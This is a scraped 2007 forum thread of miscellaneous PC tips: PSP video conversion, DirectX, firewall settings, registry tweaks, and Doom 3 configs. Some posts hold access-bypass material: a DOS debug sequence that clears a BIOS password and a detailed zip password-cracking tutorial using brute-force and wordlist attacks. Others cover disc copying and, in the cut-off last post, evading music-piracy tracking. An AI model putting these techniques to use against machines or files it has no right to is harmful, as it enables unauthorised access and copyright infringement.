(there are also other opions ie;dvd to avi etc) I have only used the vob to avi for this test.

After DVD ripper has transferred the file it will save it to the same folder as the original move was in eg: c:\africa\viteots. Open the file and you will now see an AVI icon containing the movie.

Make sure you PSP is on and in usb mode then Open Image convertor 2 and press on movie / add to list. For this example i click on C:drive the found the folder Africa and opened it and there was my converted AVI file. Click the file press ok and it will be transfered to your PSP for viewing pleasure.

*****Note**** i only converted one VOB file as thatS all there was for this particular movie. If you have more then one vob file you may need to try the dvd to avi when you rip. This is just a guide i worked out to compress dvd into the smallest possible file so you can get value out of a 512 card.

QUOTE
Only the registered members can see the link

Image Converter 2.1 JAP translated to ENG.

Master
29-04-07, 00:49
BURNING X-BOX & GAMECUBE GAMES USEING CDRWIN
------------------------------------------------------
1) Insert your original in your CD-ROM.
2) Open CDRWin (or any other image extractor) to make an iso image of the game
on your hard disc. Click on 'Extract Disc/Tracks/Sectors'
3) Here are the settings which work for me (!):
Disc Image/Cue sheet
File-Format: Automatic
Reading-Options:
RAW, CD+G, CD-TEXT and MCN/USRC all Unchecked
Error Recovery: Ignore
Jitter Correction: Auto
Subcode Analyses: Fixed
Data-Speed: MAX
Read Retry Count: 10
Audio Speed: MAX
Subcode Threshold: 900
There are a lot of reports, that Raw reading also works, but I had problems with it enabled.
4) Click on 'Start'
--------------------------------------------------------------------------------
RECORDING TO A DISC
--------------------------------------------------------------------------------
1) Install Fireburner

2) Double click on the Cue File For The Game
3) Right Click And select burn To CD
That?s all there is record DAO, and you can try to burn it fast at 2X
Using PNY Black Diamond CDR'

Master
29-04-07, 09:07
Here is the best way to crack the bios password in win 95/98:

Follow the steps below:

1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.

3) type the command at the prompt: "debug" (without quotes ninja.gif )
4) type the following lines now exactly as given.......
o 70 10
o 71 20
quit
exit

4) exit from the dos prompt and restart the machine


password protection gone!!!!!!!!!!!!! biggrin.gif

EnjoYYYYYYYYYY

PS: I tested this in Award Bios........
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine...........

I have not found any other trouble if the codes are used.

To be on safe side, just back up your data..........


The use of this code is entirely at ur risk.......... It worked fine for me..........

Master
29-04-07, 09:07
Cracking Zip Password Files

Tut On Cracking Zip Password Files..
What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.
FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at Only the registered members can see the link).
FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.
The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.
FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from Only the registered members can see the link There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.
Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait...and have good thoughts like "In wordlist mode I'm gonna get the password in minutes" or something like this... you start doing all this and remember "Hey this guy started with all this bullshit and didn't say how I can start a wordlist attack!..." So please wait just a little more, read this tutorial 'till the end and you can do all this "bullshit".

We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack.
If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

Now that we've gone through all the theoretical stuff, let's get to the actual commands.


--------------------------------------------------------------------------------
Bruteforce
--------------------------------------------------------------------------------


The command line you'll need to use for using brute force is:

fzc -mb -nzFile.zip -lChr Lenght -cType of chars

Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too)

For Chr Lenght you can use 4 kind of switches...

-> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
-> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
-> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live...
-> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option...

For the Type of chars we have 5 switches they are:

-> a for using lowercase letters
-> A for using uppercase letters
-> ! for using simbols (check the Bforce.txt if you want to see what simbols)
-> s for using space
-> 1 for using numbers


Example:
If you want to find a password with lowercase and numbers by brute force you would just do something like:

fzc -mb -nzTest.zip -l4-7 -ca1

This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.

*****
hint
*****

You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.


--------------------------------------------------------------------------------
Wordlis
--------------------------------------------------------------------------------

Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
To start a wordlist attak you'll do something like.

fzc -mwMode number -nzFile.zip -nwWordlist

Where:

Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path.

You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
So if you something like

fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

FZC would just start reading at line 50 and would just read with length >= to 9.

Example:

If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50





--------------------------------------------------------------------------------
Resuming
--------------------------------------------------------------------------------

Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
To resume the bruteforce attack you just need to do:

fzc -mr

And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type

fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.


Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program

Master
29-04-07, 09:08
Configuring Crap Software Pro
--------------------------------------
Configuring The Standard Settings

Your first configuration should be this of Crap Software should be like this----

Launch Crap Software Pro and click to highlight the "Overview"
tab on the left hand side . In the pane that appears on the right
hand side click the "Preferences" tab and in the section "Check for updates" check "Manually".

In the "General" section you can also configure Crap Software to load at
start up which is advisable because this software is your first line
defence against uninvited invasion of your computer by a whole
gamult of virii, spyware, adware and bots! Virus checking software
does have its place but remember that prevention is always better
than a cure!

Crap Software Pro's program control is automatically configured.
When you run it for the first time it will ask on behalf of programs
installed on your system for permission to access the Internet.
Your Browser will be the first to request - just tick the "Yes"
box and the "Remember this setting" box and Crap Software will
always allow your browser access automatically.

Unless you use online databases etc., there should be no
reason for any application other than a browser, email client, ftp client,
streaming media player or a download manager to gain access to the Internet.

So consider what type of program it is that needs Internet access
before giving Crap Software permission to allow it. If it is just a driver file
(.DLL) that requests Internet access, always search Windows to try
and identify it. Many seudo-virii such as AdWare and sub class
seven Trojans access the Internet from your system using .dll files.
----------------------------------------------

Configuring The Advanced Settings

If you are not on a LAN (connected to another computer in a network)
you can use this guide to give your firewall some real muscle:

Launch Crap Software Pro and click to highlight the "Firewall" tab on
the left hand side . In the pane that appears on the right hand side
in the section "Internet Zone Security" set the slider control to "High"
Then click the "Custom" button in the same section.
The next settings page is divided into two sections with tabs Internet
Zone and Trusted Zone at the top of the page.

Under the Internet Zone tab there is a list of settings that can
be accessed by scrolling.

At the top is the high security settings and the only thing that should
check from there is "allow broadcast/multicast".
The rest should be unchecked

Scroll down until you get to the medium security settings area.
Check all the boxes in this section until you get to "Block Incomming
UDP Ports". When you check that you will be asked to supply
a list of ports, and in the field at the bottom of the page enter
1-65535

Then go back to the list and check the box alongside "Block
Outgoing UDP Ports" and at the bottom of the page enter
1-19, 22-79, 82-7999, 8082-65535

Repeat this proceedure for the following settings
"Block Incomming TCP Ports": 1-65535
"Block Outgoing TCP Ports": 1-19, 22-79, 82-7999, 8082-65535
Then click "Apply", "Ok" at the bottom of the page.

Back in the right hand "Firewall" pane go next to the yellow
"Trusted Zone Security" section and set it to "high" with the slider.
Click "Custom" and repeat the ABOVE proceedure this time choosing
the *Trusted Zone* tab at the top of the settings page.

These settings will stop all incoming packets at ports 1-65535
and also block all pings, trojans etc. These settings will also stop all
spyware or applications from phoning home from your drive without your knowledge!

Master
29-04-07, 09:08
Create A Huge File

You can create a file of any size using nothing more than what's supplied with Windows. Start by converting the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode do to this. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the file size reaches eight digits—000F4240.

Now open a command prompt window. In Windows 95, 98, or Me, you can do this by entering COMMAND in the Start menu's Run dialog; in Windows NT 4.0, 2000, or XP enter CMD instead. Enter the command DEBUG BIGFILE.DAT and ignore the File not found message. Type RCX and press Enter. Debug will display a colon prompt. Enter the last four digits of the hexadecimal number you calculated (4240, in our example). Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example). Enter W for Write and Q for Quit. You've just created a 1-million-byte file using Debug. Of course you can create a file of any desired size using the same technique.

Master
29-04-07, 09:09
This isnt a tweak, but a great little feature! For a great way to put your digital photos to work, try creating a slide show presentation for use as a screen saver. Here's how:

1. Right-click an empty spot on your desktop and then click Properties.

2. Click the Screen Saver tab.

3. In the Screen saver list, click My Pictures Slideshow.

4. Click Settings to make any adjustments, such as how often the pictures should change, what size they should be, and whether you'll use transition effects between pictures, and then click OK.

Now your screen saver is a random display of the pictures taken from your My Pictures folder.

Master
29-04-07, 09:09
Digital Photo ID Cards
By Frank White

Q: What do you need to make a Digital Photo ID Card?
A: Making digital photo ID cards typically requires several components all working together.
1. You need a computer on which you run the photo ID badge software. You cannot print the cards on a PVC card printer without a computer – the printer can't perform anything without the computer.
2. You need software and it must:
a) Offer a database to store the names and personal information of the people for whom you want to issue badges.
b) Provide a way to integrate image capture with the database – not only import images, but associate the images with specific database records.
c) Provide a way to design and edit badges.
d) Send badges from the computer to a card printer. Badging software, like other business applications, comes in a variety of "flavors" – from low-end to high-end. That is, in addition to performing the simple processes described above, the application may come with many other "features" which enhance the usability and functionality of the application. Features might include requiring a secure log-on, allowing the user to add, delete, or edit database fields and create or print reports, etc.
3. You need a PVC card printer to print the badges. PVC (polyvinylchloride) is the same material that your white plastic household plumbing pipes are made out of. It is porous enough to allow colored inks to be absorbed into the surface of the plastic using a "dye sublimation" process, yet durable enough to last years. The PVC printer allows you to print a photo ID badge directly to a plastic card. The non-digital process required cutting and pasting an instant photo and inserting it into a laminated pouch which must then be sealed by sending it through a heat laminator.
4. You need a digital camera or other "input" device. Your PC and software must allow you to:
a) Plug in a camera.
b) Capture the image through the software. More versatile systems will allow you to capture portraits through video cameras, digital cameras, scanners, or by importing from a file –an "import from file" feature allows someone to send a picture to you by email as a file attachment, which you can then import into the database.
5. Additional hardware may be required, such as a video capture board for certain video cameras, tape backup device, UPS (uninterrupted power supply), etc. Video capture boards, for example, are installed in a PCI or AGP expansion slot on your PC's motherboard. The camera usually plugs directly into these boards. Special lighting may need to be set up where you take portrait pictures. If you want to incorporate fingerprints and signatures in your database and badge, then additional image capture devices will be required for them.
6. Consumables are also part of the package. You will need blank or pre-printed PVC cards and printer ribbons (usually in rolls which print from 250-350 cards per).

Master
29-04-07, 09:10
Direct Link To Any Page You Want To In Hotmail

This tutorial is for people that don't know how to direct link to .php pages on the web. If you are on a private computer, and don't mind auto-logging in, you will be able to access your folders much faster than going straight to hotmail.com

You will need a bit of information. Log into the hotmail main page. You will see a web address similar to the following:

Only the registered members can see the link


It won't be exactly the same but it will be similar.

It's time to shorten this up. The only bit of information you really need is the direct web address to the server that contains your particular account. In the above example, you would just need:

CODE
Only the registered members can see the link


Just copy this section from your particular server addy in your browser's address bar.

Now that the explanation is over, these are the commands you can append to the above example to reach specific pages.

'hmhome' - MSN Hotmail - Today
'HoTMaiL' - Inbox
'HoTMaiL?&curmbox=00000000-0000-0000-0000-000000000005' - Junk E-Mail
'HoTMaiL?&curmbox=00000000-0000-0000-0000-000000000004' - Drafts
'HoTMaiL?&curmbox=00000000-0000-0000-0000-000000000003' - Sent Messages
'HoTMaiL?&curmbox=00000000-0000-0000-0000-000000000002' - Trash Can
'compose' - Compose Message
'addresses' - Address Book
'options' - Options, Duh
'options?section=mail' - Mail Options
'options?section=personal' - Personal Details
'protect?screen=filter' - Junkmail Filter
'options?section=contacts' - Contact Options

------------------------------------------------------------------------------------

Remember, you just need to place these commands directly after 'Only the registered members can see the link' without spaces.

If you have never tried this before, it works on many websites. So, if you don't like navigating websites, and would rather do that through your web-browser, go ahead and do it.

Master
29-04-07, 09:11
DirectX explained

Ever wondered just what that enigmatic name means?

Gaming and multimedia applications are some of the most satisfying programs you can get for your PC, but getting them to run properly isn’t always as easy as it could be. First, the PC architecture was never designed as a gaming platform. Second, the wide-ranging nature of the PC means that one person’s machine can be different from another. While games consoles all contain the same hardware, PCs don’t: the massive range of difference can make gaming a headache.


To alleviate as much of the pain as possible, Microsoft needed to introduce a common standard which all games and multimedia applications could follow – a common interface between the OS and whatever hardware is installed in the PC, if you like. This common interface is DirectX, something which can be the source of much confusion.

DirectX is an interface designed to make certain programming tasks much easier, for both the game developer and the rest of us who just want to sit down and play the latest blockbuster. Before we can explain what DirectX is and how it works though, we need a little history lesson.

DirectX history
Any game needs to perform certain tasks again and again. It needs to watch for your input from mouse, joystick or keyboard, and it needs to be able to display screen images and play sounds or music. That’s pretty much any game at the most simplistic level.

Imagine how incredibly complex this was for programmers developing on the early pre-Windows PC architecture, then. Each programmer needed to develop their own way of reading the keyboard or detecting whether a joystick was even attached, let alone being used to play the game. Specific routines were needed even to display the simplest of images on the screen or play a simple sound.

Essentially, the game programmers were talking directly to your PC’s hardware at a fundamental level. When Microsoft introduced Windows, it was imperative for the stability and success of the PC platform that things were made easier for both the developer and the player. After all, who would bother writing games for a machine when they had to reinvent the wheel every time they began work on a new game? Microsoft’s idea was simple: stop programmers talking directly to the hardware, and build a common toolkit which they could use instead. DirectX was born.

How it works
At the most basic level, DirectX is an interface between the hardware in your PC and Windows itself, part of the Windows API or Application Programming Interface. Let’s look at a practical example. When a game developer wants to play a sound file, it’s simply a case of using the correct library function. When the game runs, this calls the DirectX API, which in turn plays the sound file. The developer doesn’t need to know what type of sound card he’s dealing with, what it’s capable of, or how to talk to it. Microsoft has provided DirectX, and the sound card manufacturer has provided a DirectX-capable driver. He asks for the sound to be played, and it is – whichever machine it runs on.

From our point of view as gamers, DirectX also makes things incredibly easy – at least in theory. You install a new sound card in place of your old one, and it comes with a DirectX driver. Next time you play your favourite game you can still hear sounds and music, and you haven’t had to make any complex configuration changes.

Originally, DirectX began life as a simple toolkit: early hardware was limited and only the most basic graphical functions were required. As hardware and software has evolved in complexity, so has DirectX. It’s now much more than a graphical toolkit, and the term has come to encompass a massive selection of routines which deal with all sorts of hardware communication. For example, the DirectInput routines can deal with all sorts of input devices, from simple two-button mice to complex flight joysticks. Other parts include DirectSound for audio devices and DirectPlay provides a toolkit for online or multiplayer gaming.

DirectX versions
The current version of DirectX at time of writing is DirectX 9.0. This runs on all versions of Windows from Windows 98 up to and including Windows Server 2003 along with every revision in between. It doesn’t run on Windows 95 though: if you have a machine with Windows 95 installed, you’re stuck with the older and less capable 8.0a. Windows NT 4 also requires a specific version – in this case, it’s DirectX 3.0a.

With so many versions of DirectX available over the years, it becomes difficult to keep track of which version you need. In all but the most rare cases, all versions of DirectX are backwardly compatible – games which say they require DirectX 7 will happily run with more recent versions, but not with older copies. Many current titles explicitly state that they require DirectX 9, and won’t run without the latest version installed. This is because they make use of new features introduced with this version, although it has been known for lazy developers to specify the very latest version as a requirement when the game in question doesn’t use any of the new enhancements. Generally speaking though, if a title is version locked like this, you will need to upgrade before you can play. Improvements to the core DirectX code mean you may even see improvements in many titles when you upgrade to the latest build of DirectX. Downloading and installing DirectX need not be complex, either.

Upgrading DirectX
All available versions of Windows come with DirectX in one form or another as a core system component which cannot be removed, so you should always have at least a basic implementation of the system installed on your PC. However, many new games require the very latest version before they work properly, or even at all.

Generally, the best place to install the latest version of DirectX from is the dedicated section of the Microsoft Web site, which is found at Only the registered members can see the link As we went to press, the most recent build available for general download was DirectX 9.0b. You can download either a simple installer which will in turn download the components your system requires as it installs, or download the complete distribution package in one go for later offline installation.

Another good source for DirectX is games themselves. If a game requires a specific version, it’ll be on the installation CD and may even be installed automatically by the game’s installer itself. You won’t find it on magazine cover discs though, thanks to Microsoft’s licensing terms.

Diagnosing problems

Diagnosing problems with a DirectX installation can be problematic, especially if you don’t know which one of the many components is causing your newly purchased game to fall over. Thankfully, Microsoft provides a useful utility called the DirectX Diagnostic Tool, although this isn’t made obvious. You won’t find this tool in the Start Menu with any version of Windows, and each tends to install it in a different place.

The easiest way to use it is to open the Start Menu’s Run dialog, type in dxdiag and then click OK. When the application first loads, it takes a few seconds to interrogate your DirectX installation and find any problems. First, the DirectX Files tab displays version information on each one of the files your installation uses. The Notes section at the bottom is worth checking, as missing or corrupted files will be flagged here.

The tabs marked Display, Sound, Music, Input and Network all relate to specific areas of DirectX, and all but the Input tab provide tools to test the correct functioning on your hardware. Finally, the More Help tab provides a useful way to start the DirectX Troubleshooter, Microsoft’s simple linear problem solving tool for many common DirectX issues.

Master
29-04-07, 09:11
On an NTFS partition, Disk Cleanup can compress old files
to save space. But calculating the savings and performing
the compression often take a long time, and on some systems,
Disk Cleanup hangs during the process. If that happens, or if
you don't care to wait, use this Registry tweak to disable the
compression: Delete the key
HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Explorer\VolumeCaches\Compress Old Files.

Master
29-04-07, 09:12
To disable the stupid feature in WinXP which tries to send a report to microsoft every time a program crashes you will have to do this:

************************************************** ***********************

Open Control Panel
Click on Preformance and Maintenance.
Click on System.
Then click on the Advanced tab
Click on the error reporting button on the bottom of the windows.
Select Disable error reporting.
Click OK
Click OK

************************************************** ***********************

Master
29-04-07, 09:12
i was recently playing games and this nasty windos logo key keep annoying me , cause i often accidently clicked it , and i start to search a solution to solve my problem, and found the following article in microsfot website, and it did work, hope this helps, thanks!

CODE
Only the registered members can see the link


or in other articles, u can copy the following messages into ur notepad and save as *.reg, and use it..

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Keyboard Layout]
"Scancode Map"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b, e0,00,00,5c,e0,\
00,00,00,00

Master
29-04-07, 09:13
First off, I've been doing this for a long time now. I still listen to a lot of the bands I've found by doing this. It's really simple, but it works like a charm. I ALWAYS find cool new stuff -- sometimes even bands that have been around 10 years that I never heard of.

The things you need:
- (Optional) A file sharing program (I use limewire)
- A browser. :]

1.) Pick one of your favorite bands.
2.) Go to amazon.com or cdnow.com (same thing)
3.) Look up that band's name
4.) Scroll down until you see "Customers who bought this title also bought:"
5.) Browse through the artists you've never heard of in that list.
6.) Check out one of their albums, preferably the one with highest rating (in stars)
7.) Either listen to the samples on amazon or download a song by them with your filesharing app.

If you like what you hear, repeat steps 3-7 using the new band's name.

You'll find TONS of new music you never thought existed.

It's a really simple way to find stuff, and I'm sure lots of you probably already do this. But for those who don't -- you'll thank me later. It works wonders. :)

Master
29-04-07, 09:13
Ok I am running Amd Athlon 1800 1.15 GHz 384 ram With a Gforce2
when I installed the game and attempted to play I got a whopping 2 fps to 4 fps to see what your FPS are put this in consol com_showFPS "1" or set com_showFPS "1" in config file
After I change some in game settings like
600x800 and low quality
Advance setting: I have High Quality Special affect checked yes and Enable Bump maps Yes all the rest are checked no.
After I did these things I am getting average of 21 fps to 35 fps and in high action areas they drop to 15 FPS
so this is what I did to my DoomConfig.
seta image_downSizeLimit "512" CHANGED THIS FROM 256
seta image_downSizeBumpLimit "512" CHANGED THIS FROM 256

Here is actual config just make a back up of your config and copy and paste. Try mine if you have an old Graphix card.

// IvL/FblnaU4w6bO89mN9XIzJKwdEz1acOB3LQ6Vj2NWPrRjcMHDUWw pZzE/zePncK8JfwT1h1fHq+5XRCsM=
unbindall
bind "TAB" "_impulse19"
bind "ENTER" "_button2"
bind "ESCAPE" "togglemenu"
bind "/" "_impulse14"
bind "0" "_impulse10"
bind "1" "_impulse0"
bind "2" "_impulse1"
bind "3" "_impulse2"
bind "4" "_impulse3"
bind "5" "_impulse4"
bind "6" "_impulse5"
bind "7" "_impulse6"
bind "8" "_impulse7"
bind "9" "_impulse8"
bind "[" "_impulse15"
bind "\\" "_mlook"
bind "]" "_impulse14"
bind "a" "_moveleft"
bind "c" "_movedown"
bind "d" "_moveright"
bind "f" "_impulse11"
bind "q" "_impulse9"
bind "r" "_impulse13"
bind "t" "clientMessageMode"
bind "y" "clientMessageMode 1"
bind "z" "_zoom"
bind "BACKSPACE" "clientDropWeapon"
bind "PAUSE" "pause"
bind "UPARROW" "_forward"
bind "DOWNARROW" "_back"
bind "LEFTARROW" "_moveLeft"
bind "RIGHTARROW" "_moveRight"
bind "ALT" "_strafe"
bind "CTRL" "_moveDown"
bind "SHIFT" "_forward"
bind "DEL" "_lookdown"
bind "PGDN" "_lookup"
bind "END" "_impulse18"
bind "F1" "_impulse28"
bind "F2" "_impulse29"
bind "F3" "_impulse17"
bind "F5" "savegame quick"
bind "F6" "_impulse20"
bind "F7" "_impulse22"
bind "F9" "loadgame quick"
bind "F12" "screenshot"
bind "KP_LEFTARROW" "_moveUp"
bind "KP_END" "_speed"
bind "KP_INS" "_impulse13"
bind "MOUSE1" "_attack"
bind "MOUSE3" "_zoom"
bind "MWHEELDOWN" "_impulse14"
bind "MWHEELUP" "_impulse15"
seta radiant_entityMode "0"
seta gui_mediumFontLimit "0.60"
seta gui_smallFontLimit "0.30"
seta net_socksPassword ""
seta net_socksUsername ""
seta net_socksPort "1080"
seta net_socksServer ""
seta net_socksEnabled "0"
seta win_ypos "22"
seta win_xpos "3"
seta sys_lang "english"
seta s_numberOfSpeakers "2"
seta s_doorDistanceAdd "150"
seta s_globalFraction "0.8"
seta s_subFraction "0.75"
seta s_playDefaultSound "1"
seta s_volume_dB "0"
seta s_meterTopTime "2000"
seta s_reverse "0"
seta s_spatializationDecay "2"
seta s_maxSoundsPerShader "1"
seta r_debugArrowStep "120"
seta r_debugLineWidth "1"
seta r_debugLineDepthTest "0"
seta r_cgFragmentProfile "best"
seta r_cgVertexProfile "best"
seta r_forceLoadImages "1"
seta r_shadows "0"
seta r_skipBump "0"
seta r_skipSpecular "1"
seta r_skipNewAmbient "0"
seta r_renderer "best"
seta r_brightness "1.595238"
seta r_gamma "1.3"
seta r_swapInterval "0"
seta r_useIndexBuffers "0"
seta r_customHeight "486"
seta r_customWidth "720"
seta r_fullscreen "1"
seta r_mode "4"
seta r_multiSamples "0"
seta image_downSizeLimit "512"
seta image_ignoreHighQuality "1"
seta image_downSizeBumpLimit "512"
seta image_downSizeSpecularLimit "64"
seta image_downSizeBump "1"
seta image_downSizeSpecular "1"
seta image_useCache "1"
seta image_cacheMegs "128"
seta image_cacheMinK "10240"
seta image_usePrecompressedTextures "1"
seta image_useNormalCompression "1"
seta image_useAllFormats "1"
seta image_useCompression "1"
seta image_roundDown "1"
seta image_forceDownSize "0"
seta image_downSize "1"
seta image_lodbias "0"
seta image_anisotropy "0"
seta image_filter "GL_LINEAR_MIPMAP_LINEAR"
seta gui_filter_gameType "0"
seta gui_filter_players "0"
seta gui_filter_password "0"
seta net_master4 ""
seta net_master3 ""
seta net_master2 ""
seta net_master1 ""
seta net_clientMaxRate "16000"
seta net_serverMaxClientRate "16000"
seta m_strafeSmooth "4"
seta m_smooth "1"
seta m_strafeScale "6.25"
seta m_yaw "0.022"
seta m_pitch "0.022"
seta sensitivity "5"
seta in_alwaysRun "0"
seta in_freeLook "1"
seta in_anglespeedkey "1.5"
seta in_pitchspeed "140"
seta in_yawspeed "140"
seta gui_configServerRate "0"
seta com_guid ""
seta com_showFPS "1"
seta com_purgeAll "1"
seta com_machineSpec "0"
seta g_decals "0"
seta g_projectileLights "0"
seta g_doubleVision "0"
seta g_muzzleFlash "0"
seta mod_validSkins "skins/characters/player/marine_mp;skins/characters/player/marine_mp_green;skins/characters/player/marine_mp_blue;skins/characters/player/marine_mp_red;skins/characters/player/marine_mp_yellow"
seta g_mapCycle "mapcycle"
seta g_voteFlags "0"
seta g_gameReviewPause "10"
seta g_countDown "10"
seta g_password ""
seta g_showBrass "1"
seta g_showProjectilePct "0"
seta g_showHud "1"
seta g_showPlayerShadow "0"
seta g_showcamerainfo "0"
seta g_healthTakeLimit "25"
seta g_healthTakeAmt "5"
seta g_healthTakeTime "5"
seta g_useDynamicProtection "1"
seta g_armorProtectionMP "0.6"
seta g_armorProtection "0.3"
seta g_damageScale "1"
seta g_nightmare "0"
seta g_bloodEffects "1"
seta ui_showGun "1"
seta ui_autoReload "1"
seta ui_autoSwitch "1"
seta ui_team "Blue"
seta ui_skin "skins/characters/player/marine_mp"
seta ui_name "Player"
seta si_spectators "1"
seta si_usePass "0"
seta si_warmup "0"
seta si_teamDamage "0"
seta si_timeLimit "10"
seta si_fragLimit "10"
seta si_maxPlayers "4"
seta si_map "game/mp/d3dm1"
seta si_gameType "singleplayer"
seta si_name "DOOM Server"
seta g_spectatorChat "0"

After I that game runs at bearable frame rate and I must say this is a beautful game! Hope this helps some one Sorry if I put this post in wrong spot did not see game support. Thank you for the quick reply of misplacement

Master
29-04-07, 09:14
***NOTE*** THIS ONLY WORKS FOR ATI CARDS

First, open your doom3\base folder. Doubleclick on the pak000.pk4 file. In the "window can't open this file .. .bla bla" dialog, go on and associate the file with an app like WinRar. With this file open in WinRar, go to the glprogs directory in the file. In there you'll find the shaders. The interaction.vfp file seems to be the main rendering shader. Altering this shader to output a constant color turns most objects into that constant color, except for stuff like computer screens etc.

So doubleclick the interaction.vfp file to open it (you may have to associate the .vfp extension with a text editor like notepad or wordpad first since we're going to edit the file). Scroll down to the fragment shader. You'll find these rows:

Code:

PARAM subOne = { -1, -1, -1, -1 };
PARAM scaleTwo = { 2, 2, 2, 2 };


Add this right below them:

Code:

PARAM specExp = { 16, 0, 0, 0 };


Now scroll down to this:

Code:

# perform a dependent table read for the specular falloff
TEX R1, specular, texture[6], 2D;


Comment out that line by adding a "#" to it, and add another line that will do the same thing with math instead, so it should look like this:

Code:

# perform a dependent table read for the specular falloff
# TEX R1, specular, texture[6], 2D;
POW R1, specular.x, specExp.x;


Save the file and close your text editor. WinRar will ask if you want to update the file in the archive, select yes. Close WinRar and enjoy about 40% higher performance in Doom3.

Master
29-04-07, 09:14
Hello Dos friends
This is a simple but most forgotton command to create
files like config.sys and autoexec.bat files, well heres it...
Even if u dont have a dos boot disk u can work ur way
to some extent.
********************************************
At c:\ prompt
type
copy con config.sys
devicehigh=c:\dos\himem.sys
device=c:\dos\setver.exe
devicehigh=c:\dos\emm386.exe ram
dos=high,umb
last drive=z
then press CTRL + z
press enter
Config.sys file will be created.
********************************************
Similarly u can create autoexec.bat
@echo off
prompt=$P$G
path=c:\dos;c:\
lh mouse
lh doskey
Press CTRL + Z
**********************************************

Master
29-04-07, 09:15
Are you scared that the RIAA is about to track you down for illegally downloading songs.
Well, here is a method of obtaining many songs absolutely free that is virtually untrackable
by modern technology. This has to do with capturing streaming audio, which in many cases, believe it or not
are plain old mp3s just waiting for you to "download." I have found most of the current top-40 as well as many others you may like, so keep searching. The music is waiting for you to find it.

Step 1:
